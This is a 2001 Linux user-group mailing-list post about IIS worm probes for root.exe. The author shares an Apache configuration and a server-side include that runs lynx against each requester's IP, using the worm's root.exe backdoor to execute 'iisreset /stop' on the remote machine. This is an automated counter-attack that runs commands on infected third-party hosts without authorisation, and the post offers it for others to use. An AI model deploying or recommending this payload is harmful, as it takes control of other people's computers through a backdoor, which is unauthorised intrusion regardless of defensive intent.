[ILUG] IIS problems

Paul Jakma paulj at alphyra.ie
Tue Sep 25 13:20:12 IST 2001


18 requests for root.exe since just 0400 today..

something i picked up of the net:

in your apache config set (if you don't serve out any legit .exe
files):

AddType text/html .ida
AddHandler server-parsed .ida
AddType text/html .exe
AddHandler server-parsed .exe

then create /default.ida and /scripts/root.exe with:

<!--#exec cmd="lynx -source
http://$REMOTE_ADDR/scripts/root.exe?/c+iisreset+/stop"-->

(must have lynx installed obviously)

--paulj

On Tue, 25 Sep 2001, Padraig Brady wrote:

> The tide is turning I think?
>
> http://www3.gartner.com/DisplayDocument?doc_cd=101034
> http://www.securityspace.com/s_survey/data/200108/index.html
>
> Padraig.
>
>
>





More information about the ILUG mailing list